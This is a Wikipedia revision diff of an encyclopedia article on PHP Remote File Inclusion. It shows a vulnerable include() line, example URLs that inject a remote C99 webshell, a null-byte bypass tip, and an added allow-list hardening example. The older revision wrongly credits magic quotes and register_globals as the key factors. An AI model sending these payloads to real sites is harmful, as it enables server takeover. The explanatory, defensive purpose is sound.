File inclusion vulnerability: Difference between revisions

From Wikipedia, the free encyclopedia
Content deleted Content added
N3T D3VIL (talk | contribs)
No edit summary
Tinnet (talk | contribs)
seriously, wtf? please join the discussion and stop making your unhelpful edits
Line 1: Line 1:
Remote File Inclusion or RFI is a technique used to attack Internet websites from a remote computer.
'''Remote File Inclusion''' (RFI) is a technique used to attack [[Internet]] websites from a remote computer.


==How the attack works==
A hacker's dream is to be able to run his own code on the website he is attacking. With a Remote File Inclusion attack, this is exactly what is made possible. The attacker is allowed to "include" his own malicious code in the space provided for PHP programs on a webpage. For instance, a piece of vulnerable PHP code would look like this:
Remote File Inclusion attacks allow [[black hat|malicious users]] to run their own [[PHP]] code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:


include($title . '/archive.php');
''include($title . '/archive.php');''


This line of PHP code, when executed, yields a URL like the following:
This line of PHP code, when executed, yields a [[Uniform Resource Locator|URL]] like the following example:


www.hacked.com/index.php?title=archive.php?
''www.vulnerable.website.com/index.php?title=archive.php?''


Because the "title" variable isn't specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server like this:
Because the <code>$title</code> variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example:


www.hacked.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php
''www.vulnerable.website.com/index.php?title=<nowiki>http://www.malicious.code.com/C99.php</nowiki>?archive.php''


The <code>include</code> function above instructs the server to retrieve <code>archive.php</code> and run its code. The code does not say what to do if the user changes <code>archive.php</code> to a file of his own, so the script runs whatever file <code>archive.php</code> is replaced with. In this case, the script would execute the malicious file, <code><nowiki>http://www.malicious.code.com/C99.php</nowiki></code>.
*Note: "?archive.php" is added to the end of the URL above only to satisfy "/archive.php" in the PHP code
which helps avoid errors when executing the code. Simply adding %00 (an ASCII null byte) instead of
"?archive.php" will have the same effect and is for obvious reasons easier to use.*


This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or [[root]], access on the server.


==Why the attack works==
The include function above instructs the server to retrieve "archive.php" and run its code. However, the code does not say what to do if the user changes "archive.php" to a file of his own (http://www.malicious.code.com/C99.php); So the script runs whatever file "archive.php" is replaced with. In this case, C99.php. This allows the hacker to include any remote file of his choice simply by editing the URL. Usually, the remote file a hacker chooses to include is a webshell. This tool written in the PHP coding language displays the files and folders on the server and can edit or add or delete files among other tasks. A webshell is commonly referred to among hackers as a c99 shell or PHP shell. Once this task is completed, the attacker can see, edit and add any file on the server and potentially escalate his privileges to root (administrator on Linux) if the server is not patched.
RFI attacks are possible because of a PHP configuration flag called <code>register_globals</code>. <code>register_globals</code> automatically defines variables in the script that are entered in the page URL. In this example, the <code>$title<code> variable will automatically be filled with <code><nowiki>http://www.malicious.code.com/C99.php?archive.php</nowiki></code> before the script is executed. Because of this security vulnerability, <code>register_globals</code> is set to OFF by default on newer servers.


==See also==
The reason this is possible is because of "register_globals". Register_globals is a script built into certain servers to allow easy access to remote files in a website. The register_globals open either local files (files on the server itself) or remote files (files on other servers) in the webpage that requests it. This was originally created to ease the pain of being a server administrator, but ended up being a nightmare for many website owners. Register_globals in now set to OFF by default on newer servers because of the problems it created but can still be easily turned ON at any time.
[[Code injection]]


==Links==
By turning off register_globals, you can easily avoid most of these problems. Another way to eliminate these threats is to define what the included file, in our case "archive.php", can and can't be. By doing this, if an attacker tries to include his own file, the PHP program will stop executing because the malicious file is not part of the acceptable file definition. One last tool that has been implemented in newer versions of servers is "Magic Quotes", which is a program that recognizes certain characters in URL's (ie. / ; : ( ) ') and replaces them with another character like a quotation mark. This program brings any attempt at including a malicious file to a halt.
[http://php.net/include PHP: include()]<br />
[http://php.net/register_globals PHP: Using Register Globals]<br />
[http://php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen PHP: Filesystem Functions: allow-url-fopen]


{{internet-stub}}
Adam Raymond

[[Category:Injection exploits]]

[[de:Remote File Inclusion]]
[[es:Remote File Inclusion]]
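Review bot: the new "Why the attack works" paragraph attributes RFI entirely to register_globals, yet the page's own link list points at allow-url-fopen, which is the setting that actually lets include() fetch a remote file; register_globals only decides whether $title is populated from the URL automatically, so a script that assigns $title from the request itself is equally exposed with register_globals off. Suggest the paragraph keep that distinction rather than presenting register_globals as the sole cause. Same paragraph: the markup around the variable is unbalanced (<code>$title<code> should close with </code>), which will swallow the rest of the sentence when rendered.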

Revision as of 19:30, 27 August 2007

Remote File Inclusion (RFI) is a technique used to attack Internet websites from a remote computer.

How the attack works

Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker supplies the location of his own malicious code where the application expects the name of a PHP file to include. For instance, a piece of vulnerable PHP code would look like this:

include($title . '/archive.php');

A page built from this line of PHP code would be requested with a URL like the following example:

www.vulnerable.website.com/index.php?title=archive.php?

Because the $title variable is never explicitly assigned or validated before it is used, an attacker can insert the location of a malicious file into the URL and have it executed on the target server, as in this example:

www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php

The include function above instructs the server to retrieve archive.php and run its code. The code does not say what to do if the user changes archive.php to a file of his own, so the script runs whatever file archive.php is replaced with. In this case, the script would execute the malicious file, http://www.malicious.code.com/C99.php.

This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or root, access on the server.

Why the attack works

RFI attacks are possible because of a PHP configuration flag called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $title variable will automatically be filled with http://www.malicious.code.com/C99.php?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.
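As an added example that is not part of the article, the vulnerable pattern from the text beside a hardened replacement that reads the parameter explicitly and allow-lists the section name; the directory layout and section names are assumptions. Note that register_globals only fills in $title automatically: include() can fetch a remote URL only when PHP's allow_url_fopen (and, in later releases, allow_url_include) is enabled, and a script that copies $_GET['title'] into $title with register_globals off is just as exposed.

```php
<?php
// Added example, not code from the article. Assumes sections live under a
// fixed "pages/" directory next to this script; section names are hypothetical.

// VULNERABLE: with register_globals=On, $title is auto-populated from the
// request, and allow_url_fopen/allow_url_include let include() fetch a URL.
// A value such as http://attacker.example/shell.php? or one ending in a %00
// null byte turns the fixed '/archive.php' suffix into a no-op.
function vulnerable_include(string $title): void
{
    include($title . '/archive.php');   // attacker controls the entire prefix
}

// HARDENED: never build an include path from raw input. Map a short,
// allow-listed key to a file on disk and confirm the resolved path stays
// inside the intended directory.
const PAGE_DIR = __DIR__ . '/pages';
const ALLOWED_SECTIONS = ['news', 'archive', 'about'];

function resolve_section_file(string $title): ?string
{
    // Only a bare lowercase word may pass: no scheme, slash, dot, null byte,
    // query string or trailing newline survives this check (\z, not $).
    if (!preg_match('/^[a-z]+\z/', $title) || !in_array($title, ALLOWED_SECTIONS, true)) {
        return null;
    }
    $candidate = realpath(PAGE_DIR . '/' . $title . '/archive.php');
    $base = realpath(PAGE_DIR);
    // realpath() returns false for a missing file; the prefix test also stops
    // a symlink inside pages/ from pointing outside it.
    if ($candidate === false || $base === false
        || strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Read the input explicitly instead of relying on register_globals.
$title = $_GET['title'] ?? 'news';
$file = resolve_section_file($title);
if ($file === null) {
    http_response_code(400);
    exit('Unknown section');
}
include $file;
```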

See also

Code injection

Links

PHP: include()
PHP: Using Register Globals
PHP: Filesystem Functions: allow-url-fopen